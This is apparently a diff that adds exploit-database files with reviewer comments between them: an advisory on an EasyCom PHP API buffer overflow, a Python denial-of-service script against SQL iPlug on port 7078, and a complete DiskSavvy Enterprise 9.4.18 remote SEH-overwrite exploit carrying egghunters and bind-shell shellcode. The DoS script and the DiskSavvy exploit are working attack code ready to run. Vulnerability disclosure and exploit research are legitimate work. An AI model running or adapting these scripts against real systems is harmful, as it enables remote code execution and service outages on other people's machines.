+Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
+
+Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
+of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
+
+ Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
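Review bot: The request in `--- PoC Session Logs ---` is published with a real-looking session identifier, `Cookie: PHPSESSID=kb0uotq6mssklf213v4a7fje47`; even for a localhost capture it should be replaced with a placeholder such as `PHPSESSID=[SESSION_ID]` before the advisory is archived. Unlike the sibling Vulnerability-Lab advisory in 41432.txt, this one has no `Solution - Fix & Patch` section, so the defect is described without the check that closes it. I would add one stating that `process.php?do=zip_download` must take the client from the authenticated session rather than from the `client` parameter, and must verify that each requested file id is assigned to that client. The dates also disagree: `Release Date` is 2017-02-21 while the disclosure timeline says 2017-02-20.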
diff --git a/platforms/windows/dos/41425.txt b/platforms/windows/dos/41425.txt
new file mode 100755
index 000000000..de864e87c
--- /dev/null
+++ b/platforms/windows/dos/41425.txt
@@ -0,0 +1,167 @@
+[+] Credits: John Page AKA Hyp3rlinX
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-PHP-API-BUFFER-OVERFLOW.txt
+[+] ISR: ApparitionSec
+
+
+Vendor:
+================
+easycom-aura.com
+
+
+
+Product:
+===========================
+EASYCOM AS400 (iBMI) PHP API
+EasycomPHP_4.0029.iC8im2.exe
+
+EASYCOM is the middleware which provides native access to IBMi data and programs. With its excellent performance and strict compliance
+with IBMi security regulations, this technology facilitates development of Internet, mobile and client/server applications in
+Windows, Linux, and IBMi.
+
+
+EasyCom tested here requires older version of PHP.
+
+Setup test environment:
+
+Windows 7
+XAMPP 1.7.3
+PHP 5.3.1 (cli) (built: Nov 20 2009 17:26:32)
+Copyright (c) 1997-2009 The PHP Group
+Zend Engine v2.3.0
+
+PHP compiled module API=20090626 (need to use for EasyCom IBM DLL)
+
+
+Vulnerability Type:
+=========================
+API Stack Buffer Overflow
+
+
+
+CVE Reference:
+==============
+CVE-2017-5358
+
+
+
+Security Issue:
+================
+EasyCom PHP API suffers from multiple Buffer Overflow entry points, which can result in arbitrary code execution on affected system.
+Below I provide some proof of concept details for a few of them.
+
+
+EAX 00000000
+ECX 41414141
+EDX 771D6ACD ntdll.771D6ACD
+EBX 00000000
+ESP 00C0F238
+EBP 00C0F258
+ESI 00000000
+EDI 00000000
+EIP 41414141
+
+C 0 ES 002B 32bit 0(FFFFFFFF)
+P 1 CS 0023 32bit 0(FFFFFFFF)
+A 0 SS 002B 32bit 0(FFFFFFFF)
+Z 1 DS 002B 32bit 0(FFFFFFFF)
+S 0 FS 0053 32bit 7EFDD000(FFF)
+T 0 GS 002B 32bit 0(FFFFFFFF)
+D 0
+O 0 LastErr ERROR_SUCCESS (00000000)
+EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
+
+
+SEH chain of main thread
+Address SE handler
+00C0F354 kernel32.7600410E
+00C0FF78 42424242
+52525252 *** CORRUPT ENTRY ***
+
+WinDbg dump...
+
+(720.a70): Access violation - code c0000005 (first/second chance not available)
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
+eax=00000000 ebx=00000000 ecx=41414141 edx=77316acd esi=00000000 edi=00000000
+eip=41414141 esp=004111e8 ebp=00411208 iopl=0 nv up ei pl zr na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
+41414141 ?? ???
+0:000> !load winext/msec
+0:000> !exploitable
+
+!exploitable 1.6.0.0
+Exploitability Classification: EXPLOITABLE
+Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000041414141
+called from ntdll!RtlDosSearchPath_Ustr+0x0000000000000ada (Hash=0x05cdf8a7.0xce7d7411)
+
+User mode DEP access violations are exploitable.
+
+
+PHP Crash:
+=============
+
+Problem signature:
+ Problem Event Name: BEX
+ Application Name: php.exe
+ Application Version: 5.3.1.0
+ Application Timestamp: 4b06c430
+ Fault Module Name: StackHash_e98d
+ Fault Module Version: 0.0.0.0
+ Fault Module Timestamp: 00000000
+ Exception Offset: 41414141
+ Exception Code: c0000005
+ Exception Data: 00000008
+ OS Version: 6.1.7601.2.1.0.256.48
+
+
+
+Exploit/POC:
+===============
+php_Easycom5_3_0.dll 0day vuln POC minus the exploit, I'm bored goin to the park.
+
+
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+==========
+High
+
+
+
+Disclosure Timeline:
+======================================
+Vendor Notification: December 22, 2016
+Vendor acknowledgement: December 23, 2016
+Vendor Release Fix/Version February 20, 2017
+February 22, 2017 : Public Disclosure
+
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
\ No newline at end of file
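Review bot: The "Disclosure Timeline" entry `Vendor Release Fix/Version February 20, 2017` gives a date but no version, and the Product section names only the installer `EasycomPHP_4.0029.iC8im2.exe`, so a reader cannot tell which builds are fixed. I would add a line such as `Fixed in: <fixed version - not stated in this advisory>` and fill it from the vendor's release notes. The file is placed under `platforms/windows/dos/`, while "Security Issue" claims arbitrary code execution and the pasted `!exploitable` output reads `EXPLOITABLE` with EIP and an SEH handler overwritten. Anyone triaging by the type field will under-rank it, so a sentence saying the `dos` class reflects only the missing working exploit would help. "Security Issue" also promises proof-of-concept details "for a few of them", yet no affected API function is named in the visible text; the hunk header announces 167 lines and fewer are shown, so that part may have been lost in extraction.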
diff --git a/platforms/windows/dos/41426.txt b/platforms/windows/dos/41426.txt
new file mode 100755
index 000000000..4fb945f7c
--- /dev/null
+++ b/platforms/windows/dos/41426.txt
@@ -0,0 +1,99 @@
+[+] Credits: John Page AKA Hyp3rlinX
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-SQL-IPLUG-DENIAL-OF-SERVICE.txt
+[+] ISR: ApparitionSec
+
+
+Vendor:
+================
+easycom-aura.com
+
+
+
+Product:
+===========
+SQL iPlug
+EasycomPHP_4.0029.iC8im2.exe
+
+SQL iPlug provides System i applications real-time access to heterogeneous and external databases
+(Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely transparent manner and without requiring replication.
+
+
+
+Vulnerability Type:
+===================
+Denial Of Service
+
+
+
+CVE Reference:
+==============
+CVE-2017-5359
+
+
+
+Security Issue:
+================
+SQL iPlug listens on port 7078 by default, it suffers from denial of service when sending overly long string via
+HTTP requests fed to the "D$EVAL" parameter.
+
+
+
+Exploit/POC:
+============
+
+import socket
+
+print 'EasyCom SQL-IPLUG DOS 0day!'
+print 'hyp3rlinx'
+
+IP = raw_input("[IP]> ")
+PORT = 7078
+payload="A"*43000
+
+arr=[]
+c=0
+while 1:
+ try:
+ arr.append(socket.create_connection((IP,PORT)))
+ arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n")
+ c+=1
+ print "doit!"
+ except socket.error:
+ print "[*] 5th ave 12:00"
+ raw_input()
+ break
+
+
+
+
+Disclosure Timeline:
+======================================
+Vendor Notification: December 22, 2016
+Vendor acknowledgement: December 23, 2016
+Vendor Release Fix/Version February 20, 2017
+February 22, 2017 : Public Disclosure
+
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+===========
+Medium
+
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
\ No newline at end of file
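Review bot: The advisory describes the trigger under "Security Issue" (an overly long `D$EVAL` value sent to port 7078) but gives no mitigation or detection guidance, and the timeline entry `Vendor Release Fix/Version February 20, 2017` names no fixed version. I would add a short section along the lines of `Mitigation: install the vendor release of February 20, 2017 (<version - not stated here>); until then limit TCP 7078 to trusted hosts`. A matching detection line would be `Detection: HTTP request lines to port 7078 whose D$EVAL value runs to tens of kilobytes (the PoC sends 43000 bytes), repeated over many connections that are never closed`. The PoC under "Exploit/POC" is Python 2 only (`print` statements, `raw_input`), which the text does not say.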
diff --git a/platforms/windows/remote/41436.py b/platforms/windows/remote/41436.py
new file mode 100755
index 000000000..8c440a3fa
--- /dev/null
+++ b/platforms/windows/remote/41436.py
@@ -0,0 +1,98 @@
+# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters
+# Date: 2017-02-22
+# Exploit Author: Peter Baris
+# Vendor Homepage: www.saptech-erp.com.au
+# Software Link: http://www.disksavvy.com/downloads.html
+# Version: 9.4.18
+# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64
+
+# WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems
+# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
+# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
+# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php
+
+import socket
+import sys
+
+try:
+ host = sys.argv[1]
+ os = sys.argv[2]
+ port = 80
+except IndexError:
+ print "[+] Usage %s win7/win10" % sys.argv[0]
+ print "[i] Example: dsavvy.py localhost win10"
+ sys.exit()
+
+
+# 355 bytes bind shell, PORT 4444, bad chars \x09\x0a\x0d\x20
+shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
+"\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"
+"\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"
+"\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"
+"\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"
+"\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"
+"\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"
+"\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"
+"\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"
+"\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"
+"\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"
+"\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"
+"\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"
+"\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"
+"\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"
+"\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"
+"\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"
+"\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"
+"\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"
+"\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"
+"\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"
+"\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"
+"\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"
+"\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")
+
+crash = "\x41" * 2487
+retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret
+filler = "\x44" * (2505-334-300-100)
+nseh = "\xeb\x08\x90\x90"
+stack_fill="\x41"*100
+nops="\x90"*8
+egg = "t00wt00w"
+
+if os == "win7":
+ wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
+"\x33\xd2"
+"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
+"\x2e\x5a\x3c\x05\x74\xef\xb8"
+"\x74\x30\x30\x77"
+"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
+"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")
+
+elif os == "win10":
+ wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"
+"\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"
+"\x74\x30\x30\x77"
+"\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"
+"\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1")
+
+else:
+ print "[!] This windows version is not supported yet"
+ exit(0)
+
+exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops + shell + filler
+
+buffer = "GET /"+exploit+" HTTP/1.1\r\n"
+buffer+= "Host: "+host+"\r\n"
+buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
+buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+buffer+="Accept-Language: en-US,en;q=0.5\r\n"
+buffer+="Accept-Encoding: gzip, deflate\r\n"
+buffer+="Referer: http://"+host+"/login\r\n"
+buffer+="Connection: keep-alive\r\n"
+buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
+buffer+="Content-Length: 5900\r\n\r\n"
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect((host,port))
+s.send(buffer)
+s.close()
+
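Review bot: The header field `# Vendor Homepage: www.saptech-erp.com.au` points at what the later comment calls the author's own website, while the Software Link is on disksavvy.com, so a reader looking for the vendor's advisory or patch is sent to the wrong place. It should probably read `# Vendor Homepage: http://www.disksavvy.com`, and the header states neither a CVE nor a fixed version. The `shell` blob is described only by the comment `# 355 bytes bind shell, PORT 4444, ...`, a claim that cannot be checked by reading the bytes. For analysts I would add a comment listing what the request looks like on the wire: `# Observables: GET path of several KB containing "t00wt00w"; Content-Length: 5900 with no body; payload comment claims a listener on TCP 4444`. The usage string `"[+] Usage %s win7/win10"` also omits the host argument that the line `host = sys.argv[1]` expects.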